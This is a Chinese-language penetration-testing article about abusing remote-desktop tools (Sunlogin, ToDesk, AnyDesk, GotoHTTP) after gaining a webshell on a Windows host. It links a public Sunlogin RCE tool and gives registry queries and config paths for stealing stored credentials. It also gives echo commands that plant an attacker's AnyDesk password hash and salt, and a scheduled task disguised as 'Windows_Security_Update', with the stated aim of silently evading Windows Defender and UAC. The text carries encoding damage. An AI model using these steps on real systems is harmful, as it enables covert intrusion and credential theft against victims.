|
前言 在內網滲透過程中��,會碰到遠程控制soft或者其他����,這里針對遠程控制軟件做如下總結。遠程控制軟件 向日葵篇 向日葵查看版本 向日葵(可以攻擊) 針對向日葵的話其實如果有本地安裝的話�����,是... 前言在內網滲透過程中���,會碰到遠程控制soft或者其他���,這里針對遠程控制軟件做如下總結。 遠程控制軟件向日葵篇向日葵查看版本向日葵(可以攻擊)針對向日葵的話其實如果有本地安裝的話�,是有可能存在漏洞的。這里進行復現 向日葵個人版for Windows <= 11.0.0.33
向日葵簡約版 <= V1.0.1.43315(2021.12)
測試客戶端漏洞版本:11.0.0.33162
攻擊過程: (1)tasklist 查看是否有sunlogin的進程
(2)直接用golang的工具來進行攻擊即可
https://github.com/Mr-xn/sunlogin\_rce 向日葵(不可以攻擊)遇到不可以攻擊的向日葵�,我們也有幾種滲透手法: (1)竊取配置文件來進行解密(低版本 版本號具體未知)低版本的向日葵把密碼和機器碼加密寫入到了配置文件中��,我們可以把配置文件down到自己的機器上��,然后進行重開向日葵即可���。這里向日葵版本較低,就不進行測試 (2)在12.5.2之前的某些版本可以寫到了注冊表中��,所以可以使用注冊表來進行查詢reg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginInfo
reg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginGreenInfo
向日葵默認配置文件路徑:
安裝版:C:\\\\Program Files\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\config.ini
便攜版:C:\\\\ProgramData\\\\Oray\\\\SunloginClient\\\\config.ini
本機驗證碼參數:encry\\\_pwd
本機識別碼參數:fastcode(去掉開頭字母)
sunlogincode:判斷用戶是否登錄狀態(tài)
在向日葵高于 12.5.3.* 的機器中已經沒有辦法獲取secert了 
todesk篇常見滲透方式(偷配置�����,百試百靈)這里還是和前面的向日葵一樣�,可以進行配置文件的竊取��,這里的默認安裝路徑(C:\Program Files\ToDesk\config.ini) 
這里咱們可以攻擊機安裝todesk����,然后讀取到config.ini中的配置文件,然后和攻擊機進行替換即可�。這里我虛擬機假裝是受害機,讀取出來���,然后攻擊機把tempauthpassex進行替換����。
本機下載todesk進行替換。
兩個機器密碼相同(進行替換的時候需要修改攻擊機密碼更新頻率)
anydeskanydesk的配置文件在 C:\\Users\\用戶名\\AppData\\Roaming\\AnyDesk 文件中
而通常這個時候我們有權限修改anydesk的配置文件���,這里進行測試����,起兩個虛擬機��,設定一個場景(攻擊機拿到了webshell��,受害機開著windows defender�����,如何去滲透拿到受害機權限) 攻擊機 ip: 10.211.55.3 + 10.211.55.2
受害機 ip: 10.211.55.4(windows defender全開)
情景復現這里拿到了受害機的webshell�,是個普通權限,無法去關閉 
這里可以看到有windows defender來運行��,這里無法進行關閉windows defender
這里用powershell來執(zhí)行遠程命令下載anydesk到用戶的目錄中去,因為虛擬機只有C盤�����,所以我創(chuàng)建了一個目錄來進行存放,在真實的滲透過程中�,一般是有RWE的目錄
這里用powershell來執(zhí)行遠程命令下載anydesk到用戶的目錄中去,因為虛擬機只有C盤,所以我創(chuàng)建了一個目錄來進行存放���,**在真實的滲透過程中����,一般是有RWE的目錄**
上傳上去之后��,先不去打開�����。轉到攻擊機進行操作 (1)這里先去給攻擊機下載anydesk(如果下載過的小伙伴���,要先清除) C:\Users\用戶名\AppData\Roaming\AnyDesk中的配置��,沒有的就不用看這一步���,清除結束后如下 
(2)這里打開攻擊機的anydesk��,牢記我此處勾選的id���,然后點擊右上角的概述-->為自主訪問設置密碼-->設置一個密碼(這里設置為Q16G666!!)--->之后點擊應用��,攻擊機完全退出anydesk(小托盤也要退出)��,并且退出時不選擇安裝anydesk 
(3)攻擊機完全退出anydesk(小托盤也要退出)�,這里還是到配置文件下 C:\Users\用戶名\AppData\Roaming\AnyDesk,然后把文件復制下來�����。是我圖中勾選的這四個��。復制完成之后�,攻擊機將文件進行刪除。
復制下來之后�,給受害機的當前用戶(拿到權限的用戶)找到anydesk配置文件路徑并且復制到其他(如果沒有配置文件路徑則進行創(chuàng)建配置文件路徑),一定要注意這里攻擊機復制完之后�,一定要將攻擊機中的配置文件進行刪除
(4)重新打開攻擊機,生成配置文件���,啟動受害機的anydesk���。
(5)用攻擊機進行連接,這里連接的id就是(2)中截圖的id���,密碼就是(2)中設置的密碼即可成功無感繞過windows defender 情景復現2 (計劃任務)(1)確定用戶創(chuàng)建計劃任務如果命令行不能去執(zhí)行����,則可以去創(chuàng)建計劃任務去執(zhí)行,例如�����,必須先確定當前用戶�����,在當前用戶的目錄下執(zhí)行anydesk���, powershell '(((Get-WmiObject -Class Win32\_Process -Filter 'Name=\\'explorer.exe\\'').GetOwner().user) -split '\\n')\[0\]
schtasks /Create /TN Windows\_Security\_Update /SC monthly /tr 'C:\\Users\\testuser.G1TS\\Desktop\\anydesk.exe' /RU 用戶名
執(zhí)行計劃任務
schtasks /run /tn Windows\_Security\_Update
后續(xù)步驟和上面相同
然后添加密碼到配置文件中去即可����。 echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.conf
然后查看用戶的id type C:\Users\用戶名\AppData\Roaming\AnyDesk\system.conf
連接即可 優(yōu)點:整個過程都不需要進行UAC彈窗�,真正實現了無感繞過 缺點:(1)會彈出anydesk的界面,導致一些問題 (2)啟動anydesk的權限需要桌面用戶權限�����,比如���,IIS做了中間件環(huán)境���,拿到的webshell一般都是沒有桌面用戶權限,如果啟動anydesk是不會成功的����。 gotohttpgotohttp在我的滲透測試過程中,是一個常見的方式��,給我的感覺��,即用即連�����,瀏覽器連接��,方便快捷��。但是缺點就是權限劃分明確���,普通用戶權限起的gotohttp無法進行管理員權限操作�,比如關閉windows defender和其他一些行為���,不過在規(guī)避殺軟這兒也有奇效��。 復現過程普通用戶上去之后只能用普通用戶權限(這里下載對應的gotohttp https:///)��,上傳上去��,命令行運行他�����,直接在當前目錄下生成配置文件�,讀取配置文件,即可成功連接
因為是普通用戶啟動的����,這里如果嘗試關閉windows defender,是無法進行點擊的����。
參考https://blog.csdn.net/weixin_44216796/article/details/112118108
文章來源:原文鏈接:https://forum./share/2310
黑白之道發(fā)布、轉載的文章中所涉及的技術�����、思路和工具僅供以安全為目的的學習交流使用����,任何人不得將其用于非法用途及盈利等目的����,否則后果自行承擔�����! 如侵權請私聊我們刪文
|
